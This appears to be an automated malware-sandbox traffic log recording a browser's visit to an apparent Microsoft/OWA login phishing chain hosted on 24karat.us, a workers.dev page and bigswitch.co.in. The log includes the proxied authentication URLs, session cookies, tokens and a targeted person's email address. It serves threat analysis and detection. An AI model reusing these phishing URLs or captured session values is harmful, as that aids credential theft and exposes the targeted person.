    Source: global trafficHTTP traffic detected: GET /owa/?login_hint=jgol%40bgclinic.com HTTP/1.1Host: 24karat.usConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4
    Source: global trafficHTTP traffic detected: GET /captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00= HTTP/1.1Host: 24karat.usConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4; ClientId=AD8DDA6D248F459D832803D0055B823B; OIDC=1; OpenIdConnect.nonce.v3.g427BzjQDBzf0BO-QNx0HwoLVfc2raPrjczMthckQqc=638467142511721442.75e664b3-455f-4a7a-b6ee-97291afcfdb8; X-OWA-RedirectHistory=ArLym14B4nsrvntK3Ag
    Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_GW4zPEKtwiiwtRHaCqGPVw2.js HTTP/1.1Host: 24karat.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4; ClientId=AD8DDA6D248F459D832803D0055B823B; OIDC=1; OpenIdConnect.nonce.v3.g427BzjQDBzf0BO-QNx0HwoLVfc2raPrjczMthckQqc=638467142511721442.75e664b3-455f-4a7a-b6ee-97291afcfdb8; X-OWA-RedirectHistory=ArLym14B4nsrvntK3Ag; esctx-lZyzPZZ7dso=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd85eCgDwL7M8YVfiTo-qIfO8StpvsLk0tqGoGFWefLdFyaafHaf7O_n8GPUbJCkB87Vi65bbl_yGNCRT2TFf8iuGD99QfWdfwTN6UEFGMUgIqrJqaS-tOc1s6BT-joOb3kURJuKMJLK3JyzXobixdYjiAA; fpc=AnAxjE-_txJPjQb7YYiXMlU; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd828fF6I_XkBu9671vguo1Q-kUj_aaWavCZbbevWme2Iye5T7j5evWQA9m7zcoikJfzS2vlzmFf7HRVxoZwN2oO7hhr3V4eB-Y53a95UCEfmIL7cAmUFARrV8dZ_bC-AirXdhJ0AzcrEQHwh7utoz485kNe-KtFuVC1ODAc4cxDK8gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00=&sso_reload=true HTTP/1.1Host: 24karat.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4; ClientId=AD8DDA6D248F459D832803D0055B823B; OIDC=1; OpenIdConnect.nonce.v3.g427BzjQDBzf0BO-QNx0HwoLVfc2raPrjczMthckQqc=638467142511721442.75e664b3-455f-4a7a-b6ee-97291afcfdb8; X-OWA-RedirectHistory=ArLym14B4nsrvntK3Ag; esctx-lZyzPZZ7dso=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd85eCgDwL7M8YVfiTo-qIfO8StpvsLk0tqGoGFWefLdFyaafHaf7O_n8GPUbJCkB87Vi65bbl_yGNCRT2TFf8iuGD99QfWdfwTN6UEFGMUg
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqVkZOYU5OZ0FNM1hkSEdkMDNVN0RSU1VJQWliYWZQWFpDME1sbTVKTzl1NldacXRWcVFrYVpLbVRmdGxTNXAyZi1CSkJDOWpoeDJHSl9HMDB4QVJtUmNQbm5heDU1M0VpMlhDbUo1MkV0ZDU4YWJ2OEhqd2VEeDRid0tsSWxUaUR2a0hOTkZuZ2pRTWl0RDB2dm9McTJORDRkR1hOOEROdDcxM2tmVlAzMzdzZnBfWkE2R3liZmw2UklPTmZYQ3I2bm1PbTRoR1ljdXpJYXhIb0dGWTJxVVpoVzBsLWg2QUxnQTlBSFlDb3pVVDJqT3FxZGxXMDlJdTR3R2VZNlpZanFkWU9rWlJQRTJ4TEIzaFl6ckhzU3BEc0xHWVFiQUtyeEFxcC10RW5LZmpsR0pvUmtXZE9nNk1MQWd0cjByM0NhNWE2X3JQUU1pQXE0MnlBMTF2RDMwQjVqUzNJOEtjS1lySnZDVVplYkc1MUtFcnNsWG5jcXdwenMyTEtYT3RUbmpacVNMUE9QbWt4U1c1U2pIdGlpVF9xSlpUQkZySXRKT3lGbmVGYW9vcktHSkhWaVI3cGJNbVFZRmZUc1pya0NXV2FMb1M3eWhGZ3ZkRko5c3E4WDR4WFY0czBJN2Q5bVM3eUdRZkdMN3E2ZTNjUHZwZlk3OUJzWXROR3JCNWhHTFEwWnRXcFJzRVg0TGdKRGhNb29uQndhRXdNbzdjUnM2RDROWEF4Uy1KOGRlN1g1LU9acDV0ZGpmdkpoM2thQ0RxcElSVXFkbVJkY3RORnlSSjR1NlhhdkVWcGxUTlN5b3BMc2UxdEo5WmdISmhQaVZQc3dscUd3UGJHSGFJaFFiUk1JS2pzNHRVRHdObkdIaC1CVGtNX2V2WTdsVndNQXlPaDlraFRMTVZxLUdPVFd6Z1ZxWHN3YnJleEJNYmVLZmhsald0cjN6RmJ1a3VubmlNWDFUZ1Q3YTJ0ajVlUTg2dm4tMmNfdnJ3ZWVjMGZUSnlMNlpJRlVNMVo5dFpsWkUxZWxKNjZKTkxRcWFWTDVpcFpZY2hWeWpEdFNjenF0bUMwd2RoNURjMSZsb2dpbl9oaW50PWpnb2wlNDBiZ2NsaW5pYy5jb20mZXN0c2ZlZD0xJnVhaWQ9MDExYjljMTFiNDFjYjZlODJlN2FjNGU3ZjE5NmViNDAmY29icmFuZGlkPWRlYjNmNzRhLWVkNWItNGVmMS04ZDNjLTkyYjg1ZGQ0NzM1MiZmY2k9MDAwMDAwMDItMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwIw== HTTP/1.1Host: 24karat.usConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtN
    Source: global trafficHTTP traffic detected: GET /shared/5/js/login_en_4XWJLQsDnjOrefMiFTdF2g2.js HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://24karat.us/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/5/chunks/oneds-analytics-js_c53074e74ebeb8e140d6_en.js HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://24karat.ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://24karat.us/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1Host: logincdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://24karat.us/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1Host: logincdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET ///////////portfolio////////wpfile///////////wp-user%E3%80%82////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20= HTTP/1.1Host: bigswitch.co.inConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bigswitch.co.inConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://bigswitch.co.in///////////portfolio////////wpfile///////////wp-user%E3%80%82////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: unknownDNS traffic detected: queries for: manage.kmail-lists.com
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1866956230:1711114023:qi2FWv_Rg0fiI6pnc0EZrR7oXCzTXz1FUAULF1OGhso/8686d7969ff38c8d/99cb5747b72fd32 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2754sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 99cb5747b72fd32sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ydlqt/0x4AAAAAAAUst_7UhbXCEgdQ/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Mar 2024 14:23:50 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: chromecache_61.2.drString found in binary or memory: http://knockoutjs.com/
    Source: chromecache_61.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
    Source: chromecache_59.2.drString found in binary or memory: https://24karat.us?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzI0a2FyYXQudXMi
    Source: chromecache_53.2.dr, chromecache_62.2.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
    Source: chromecache_61.2.drString found in binary or memory: https://github.com/douglascrockford/JSON-js
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
